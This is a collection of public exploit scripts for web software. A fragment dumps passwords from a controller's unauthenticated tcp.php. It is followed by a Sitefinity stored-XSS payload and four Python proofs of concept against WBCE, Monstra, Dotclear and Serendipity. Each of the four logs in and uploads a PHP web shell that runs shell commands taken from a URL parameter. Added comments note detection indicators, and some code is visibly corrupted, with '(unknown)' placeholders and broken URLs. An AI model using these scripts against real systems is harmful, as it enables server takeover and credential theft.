# No credentials or session cookie are sent: the advisory's point is that
# tcp.php answers this request unauthenticated.  For defenders, a POST to
# /tcp.php carrying function_id=tcp_xml_request from an unexpected source
# is a concrete detection signature, and the controller's web interface
# should not be reachable from untrusted networks.
post_data = {'function_id' : function_id.lower(), 'command' : command.upper()}
r = requests.post(url, data=post_data)

if r.status_code == 200:
    # The response is URL-encoded and HTML-entity-encoded; decode both
    # layers before searching it.
    r_d = unquote(r.text)
    f_d_r = html.unescape(r_d)
    # Pulls every pwd="..." attribute value out of the decoded body.
    regex = r'pwd="([^"]+)"'
    rain = re.findall(regex, f_d_r)
    for drops in rain:
        print(' ',drops)
        time.sleep(0.5)  # cosmetic pacing of the output only
else:
    print(f"Dry season! {r.status_code}")
  21. # Exploit Title: Sitefinity 15.0 - Cross-Site Scripting (XSS) # Date: 2023-12-05 # Exploit Author: Aldi Saputra Wahyudi # Vendor Homepage: https://www.progress.com/sitefinity-cms # Version: < 15.0.0 # Tested on: Windows/Linux # CVE : CVE-2023-27636 # Description: In the backend of the Sitefinity CMS, a cross-site scripting vulnerability has been discovered in all features that use the SF-Editor # Steps To Reproduce: Attacker has the lower privilege, victim has the higher privilege 1. Log in as the attacker 2. Go to a feature that uses the SF Editor, for example the News page 3. Create or edit a news item 4. In the content form, insert the XSS payload as HTML 5. After the payload is inserted, click on the content form (just click) and publish or save 6. If the victim visits the page containing the XSS payload, the XSS is triggered Payload: <noalert><iframe src="javascript:alert(document.domain);">
# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)
# Date: 3/5/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip
# Version: 1.6.2
# Tested on: MacOS
#
# Flow of the PoC: authenticate against the admin login form, then post a
# multipart upload to the bundled elFinder connector.  Both `requests` and
# `bs4` are third-party dependencies.
import requests
from bs4 import BeautifulSoup
import sys
import time


def login(url, username, password):
    """Log in to the WBCE admin panel and return the authenticated session.

    Args:
        url: Site base URL without a trailing slash (the paths below are
            appended verbatim).
        username: Admin username.
        password: Admin password.

    Returns:
        The `requests.Session` holding the login cookies, or None when the
        response does not contain the string "Administration".
    """
    print("Logging in...")
    time.sleep(3)
    with requests.Session() as session:
        response = session.get(url + "/admin/login/index.php")
        soup = BeautifulSoup(response.text, 'html.parser')
        form = soup.find('form', attrs={'name': 'login'})
        # Start from every non-submit input of the form so hidden fields
        # (presumably tokens/nonces) are echoed back unchanged.
        form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in form.find_all('input') if input_tag.get('type') != 'submit'}
        # Update the username and password fields dynamically: the real field
        # names are read from the hidden inputs `username_fieldname` and
        # `password_fieldname` rather than hard-coded.
        form_data[soup.find('input', {'name': 'username_fieldname'})['value']] = username
        form_data[soup.find('input', {'name': 'password_fieldname'})['value']] = password
        post_response = session.post(url + "/admin/login/index.php", data=form_data)
        if "Administration" in post_response.text:
            print("Login successful!")
            time.sleep(3)
            # NOTE(review): returning from inside the `with` runs
            # Session.__exit__ (close) before the caller uses the session;
            # confirm this is intended.
            return session
        else:
            print("Login failed.")
            print("Headers received:", post_response.headers)
            print("Response content:", post_response.text[:500])  # first 500 characters
            return None


def upload_file(session, url):
    """Upload a fixed-name PHP file through the elFinder connector.

    Args:
        session: Authenticated session returned by `login`.
        url: Site base URL without a trailing slash.

    The script expects the file to be served afterwards from
    `<url>/media/shell.inc`; because the name is fixed, that path is a
    concrete on-disk indicator for defenders, as is a `cmd=upload` request
    to `connector.wbce.php` carrying a non-media extension.  The control
    point is the connector's extension allowlist and whether the media
    directory is allowed to execute server-side code.
    """
    # Set the file content and name.
    print("Shell preparing...")
    time.sleep(3)
    # Multipart field `upload[]` (elFinder's upload parameter); the declared
    # MIME type is application/octet-stream while the content is PHP.
    files = {'upload[]': ('shell.inc',"""<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>""", 'application/octet-stream')}
    # `reqid` and `mtime[]` are static values, presumably captured from a
    # browser session; `target` looks like elFinder's hashed destination
    # directory — TODO confirm.
    data = { 'reqid': '18f3a5c13d42c5', 'cmd': 'upload', 'target': 'l1_Lw', 'mtime[]': '1714669495' }
    response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php", files=files, data=data)
    # NOTE(review): only the HTTP status is checked; the connector's JSON
    # body (which may report an error with a 200) is not inspected.
    if response.status_code == 200:
        print("Your Shell is Ready: " + url + "/media/shell.inc")
    else:
        print("Failed to upload file.")
        print(response.text)


if __name__ == "__main__":
    # No argument-count check: fewer than three arguments raises IndexError.
    url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    session = login(url, username, password)
    if session:
        upload_file(session, url)
# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)
# Date: 05.05.2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://monstra.org/
# Software Link: https://monstra.org/monstra-3.0.4.zip
# Version: 3.0.4
# Tested on: MacOS
#
# Flat script: log in to the admin panel, read the CSRF token from the
# theme "add chunk" page, then save user-supplied content as a theme chunk.
# The only third-party dependency is `requests`.
import requests
import random
import string
import time
import re
import sys

if len(sys.argv) < 4:
    print("Usage: python3 script.py <url> <username> <password>")
    sys.exit(1)

base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

session = requests.Session()
login_url = f'{base_url}/admin/index.php?id=dashboard'
# Form field names of the Monstra admin login.
login_data = { 'login': username, 'password': password, 'login_submit': 'Log+In' }
# Five random lowercase alphanumerics; `random` is fine here since the
# name only needs to be unlikely to collide, not unpredictable.
filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k= 5))

print("Logging in...")
response = session.post(login_url, data=login_data)
# Success heuristic: the dashboard page is returned after login.
if 'Dashboard' in response.text:
    print("Login successful")
else:
    print("Login failed")
    exit()  # NOTE(review): site-module `exit()`, not `sys.exit()`
time.sleep(3)

edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'
response = session.get(edit_url)  # fetch the edit page to find the CSRF token
# NOTE(review): the space between `value="` and `(.*?)` looks like a line-wrap
# artifact of the listing; as written the pattern only matches when a space
# precedes the token value — confirm against the original source.
token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value=" (.*?)"', response.text)
if token_search:
    token = token_search.group(1)
else:
    print("CSRF token could not be found.")
    exit()

# Chunk body.  The original line breaks were lost when the listing was
# flattened; the literal is kept as it appears on the page.
content = ''' <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> '''
edit_data = { 'csrf': token, 'name': filename, 'content': content, 'add_file': 'Save' }

print("Preparing shell...")
# The theme editor writes `content` to a .chunk.php file under the public
# themes directory (see the path printed below), so an admin account is
# effectively a code-execution capability.  For defenders: new or changed
# *.chunk.php files under public/themes/ and POSTs to action=add_chunk are
# the things to watch.
response = session.post(edit_url, data=edit_data)
time.sleep(3)
# NOTE(review): a 200 only means the form round-tripped; the body is not
# checked for an error message.
if response.status_code == 200:
    # NOTE(review): "(unknown)" here looks like an extraction artifact that
    # replaced an interpolated value (presumably `filename`) — confirm
    # against the original source.
    print(f"Your shell is ready: {base_url}/public/themes/default/(unknown) .chunk.php")
else:
    print("Failed to prepare shell.")
# Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 26.04.2024
# Vendor Homepage: https://git.dotclear.org/explore/repos
# Software Link: https://github.com/dotclear/dotclear/archive/refs/heads/master.zip
# Tested Version: v2.29 (latest)
# Tested on: MacOS
#
# Flow of the PoC: authenticate, read the `xd_check` CSRF token from the
# Media admin page, then hand-build a multipart upload of a PHP file whose
# part is declared as image/jpeg.  `requests` and `bs4` are third-party.
import requests
import time
import random
import string
from bs4 import BeautifulSoup


def generate_filename(extension: str = ".inc") -> str:
    """Return five random ASCII alphanumerics followed by `extension`."""
    return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) + extension


def get_csrf_token(response_text: str):
    """Return the value of the hidden `xd_check` input in `response_text`.

    Returns None when no such input is present.  Note this takes the page
    text, not a response object.
    """
    soup = BeautifulSoup(response_text, 'html.parser')
    token = soup.find('input', {'name': 'xd_check'})
    return token['value'] if token else None


def login(base_url, username, password):
    """Authenticate against `process=Auth` and return the session.

    Args:
        base_url: Site base URL without a trailing slash.
        username: Posted as `user_id`.
        password: Posted as `user_pwd`.

    Returns:
        The logged-in `requests.Session`, or None when the response does not
        contain "Logout" (the success heuristic used here).
    """
    print("Exploiting...")
    time.sleep(1)
    print("Logging in...")
    time.sleep(1)
    session = requests.Session()
    login_data = { "user_id": username, "user_pwd": password }
    login_url = f"{base_url}/admin/index.php?process=Auth"
    login_response = session.post(login_url, data=login_data)
    if "Logout" in login_response.text:
        print("Login Successful!")
        return session
    else:
        print("Login Failed!")
        return None


def upload_file(session, base_url, filename):
    """Upload PHP content through the Media admin page as `filename`.

    Args:
        session: Authenticated session from `login`.
        base_url: Site base URL without a trailing slash.
        filename: Name for the uploaded file (see `generate_filename`).

    The script expects the file to be served from `<base_url>/public/`
    afterwards.  For defenders: the part's Content-Type (image/jpeg) is
    client-controlled and says nothing about the payload, so validation
    has to look at content and extension on the server, and the public
    media directory should not pass `.inc` files to the PHP handler.
    """
    print("Shell Preparing...")
    time.sleep(1)
    # Fixed multipart boundary, presumably copied from a browser capture.
    boundary = "---------------------------376201441124932790524235275389"
    headers = { "Content-Type": f"multipart/form-data; boundary={boundary}", "X-Requested-With": "XMLHttpRequest" }
    # NOTE(review): the space in "{base_url} /admin" looks like a line-wrap
    # artifact of the listing (same below) — confirm against the original.
    csrf_token = get_csrf_token(session.get(f"{base_url} /admin/index.php?process=Media").text)
    # Hand-assembled multipart body: MAX_FILE_SIZE, xd_check, then the
    # file part `upfile[]`.
    # NOTE(review): "(unknown)" in the filename= field looks like an
    # extraction artifact that replaced an interpolated value (presumably
    # `filename`) — confirm against the original source.
    payload = (
        f"--{boundary}\r\n"
        f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n"
        f"2097152\r\n"
        f"--{boundary}\r\n"
        f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n"
        f"{csrf_token}\r\n"
        f"--{boundary}\r\n"
        f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"(unknown) \"\r\n"
        f"Content-Type: image/jpeg\r\n\r\n"
        "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\">\n"
        "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n"
        "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n} \n?>\n</pre>\n</body>\n</html>\r\n"
        f"--{boundary}--\r\n"
    )
    upload_response = session.post(f"{base_url} /admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0", headers=headers, data=payload.encode('utf-8'))
    # NOTE(review): only the HTTP status is checked, not the response body.
    if upload_response.status_code == 200:
        # NOTE(review): "(unknown)" — same extraction artifact as above.
        print(f"Your Shell is Ready: {base_url}/public/(unknown)")
    else:
        print("Exploit Failed!")


def main(base_url, username, password) -> None:
    """Generate a filename, log in, and upload if the login succeeded."""
    filename = generate_filename()
    session = login(base_url, username, password)
    if session:
        upload_file(session, base_url, filename)


if __name__ == "__main__":
    import sys  # only needed for the CLI entry point
    if len(sys.argv) != 4:
        print("Usage: python script.py <siteurl> <username> <password>")
    else:
        base_url = sys.argv[1]
        username = sys.argv[2]
        password = sys.argv[3]
        main(base_url, username, password)
# Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 26.04.2024
# Vendor Homepage: https://docs.s9y.org/
# Software Link:https://www.s9y.org/latest
# Tested Version: v2.5.0 (latest)
# Tested on: MacOS
#
# Flow of the PoC: read the `serendipity[token]` CSRF value from the admin
# login page, authenticate, re-read the token from the media module, then
# hand-build a multipart upload of a PHP file declared as text/html.
# `requests` and `bs4` are third-party dependencies.
import requests
import time
import random
import string
from bs4 import BeautifulSoup


def generate_filename(extension: str = ".inc") -> str:
    """Return five random ASCII alphanumerics followed by `extension`."""
    return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) + extension


def get_csrf_token(response):
    """Return the hidden `serendipity[token]` value from a response object.

    Returns None when the input is absent.  Unlike a text-taking helper,
    this reads `response.text` itself.
    """
    soup = BeautifulSoup(response.text, 'html.parser')
    token = soup.find('input', {'name': 'serendipity[token]'})
    return token['value'] if token else None


def login(base_url, username, password):
    """Log in to serendipity_admin.php and return the session.

    Args:
        base_url: Site base URL without a trailing slash.
        username: Posted as `serendipity[user]`.
        password: Posted as `serendipity[pass]`.

    Returns:
        The logged-in `requests.Session`, or None when the response does not
        contain "Add media" (the success heuristic used here).
    """
    print("Logging in...")
    time.sleep(2)
    session = requests.Session()
    # The login form carries its own CSRF token; fetch it first.
    login_page = session.get(f"{base_url}/serendipity_admin.php")
    token = get_csrf_token(login_page)
    data = { "serendipity[action]": "admin", "serendipity[user]": username, "serendipity[pass]": password, "submit": "Login", "serendipity[token]": token }
    headers = { "Content-Type": "application/x-www-form-urlencoded", "Referer": f"{base_url}/serendipity_admin.php" }
    response = session.post(f"{base_url}/serendipity_admin.php", data=data, headers=headers)
    if "Add media" in response.text:
        print("Login Successful!")
        time.sleep(2)
        return session
    else:
        print("Login Failed!")
        return None


def upload_file(session, base_url, filename, token):
    """Upload PHP content via the media admin module as `filename`.

    Args:
        session: Authenticated session from `login`.
        base_url: Site base URL without a trailing slash.
        filename: Name for the uploaded file (see `generate_filename`).
        token: CSRF token read from the media module page.

    The script expects the file to be served from `<base_url>/uploads/`
    afterwards.  For defenders: the part's Content-Type (text/html) is
    client-controlled; the server-side controls are the media module's
    extension/content validation and not letting the uploads directory
    execute `.inc` files through PHP.
    """
    print("Shell Preparing...")
    time.sleep(2)
    # Fixed multipart boundary, presumably copied from a browser capture.
    boundary = "---------------------------395233558031804950903737832368"
    # NOTE(review): the space in "{base_url} /serendipity_admin.php" looks like
    # a line-wrap artifact of the listing (same below) — confirm against the
    # original.
    headers = { "Content-Type": f"multipart/form-data; boundary={boundary}", "Referer": f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media" }
    # Hand-assembled multipart body: token, action=admin, adminModule=media,
    # adminAction=add, then the file part `serendipity[userfile][1]`.
    # NOTE(review): "(unknown)" in the filename= field looks like an
    # extraction artifact that replaced an interpolated value (presumably
    # `filename`) — confirm against the original source.
    payload = (
        f"--{boundary}\r\n"
        f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n"
        f"{token}\r\n"
        f"--{boundary}\r\n"
        f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n"
        f"admin\r\n"
        f"--{boundary}\r\n"
        f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n"
        f"media\r\n"
        f"--{boundary}\r\n"
        f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n"
        f"add\r\n"
        f"--{boundary}\r\n"
        f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\"; filename=\"(unknown)\"\r\n"
        f"Content-Type: text/html\r\n\r\n"
        "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\">\n"
        "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n"
        "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n} \n?>\n</pre>\n</body>\n</html>\r\n"
        f"--{boundary}--\r\n"
    )
    response = session.post(f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media", headers=headers, data=payload.encode('utf-8'))
    # Success heuristic: the module's "successfully uploaded" message.
    # NOTE(review): this f-string has no placeholder; "(unknown)" is the same
    # extraction artifact as above, so as written the check is unlikely to
    # match — confirm against the original source.
    if f"File (unknown) successfully uploaded as" in response.text:
        print(f"Your shell is ready: {base_url}/uploads/(unknown)")
    else:
        print("Exploit Failed!")


def main(base_url, username, password) -> None:
    """Generate a filename, log in, fetch the media-page token, and upload."""
    filename = generate_filename()
    session = login(base_url, username, password)
    if session:
        # The token is re-read from the media module page rather than reused
        # from the login page.
        token = get_csrf_token(session.get(f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media"))
        upload_file(session, base_url, filename, token)


if __name__ == "__main__":
    import sys  # only needed for the CLI entry point
    if len(sys.argv) != 4:
        print("Usage: python script.py <siteurl> <username> <password>")
    else:
        main(sys.argv[1], sys.argv[2], sys.argv[3])